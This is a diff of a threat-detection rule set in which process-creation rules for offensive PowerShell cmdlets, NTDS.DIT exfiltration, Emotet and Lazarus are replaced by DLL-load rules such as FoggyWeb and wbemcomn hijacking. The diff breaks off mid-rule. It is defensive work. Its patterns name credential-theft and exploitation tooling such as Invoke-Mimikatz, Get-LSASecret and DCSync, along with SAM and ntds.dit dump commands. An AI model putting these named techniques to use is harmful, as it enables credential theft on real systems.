"Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": 
[ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE 
'\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR 
CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR 
CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN 
('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 
'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or 
dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + 
"attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 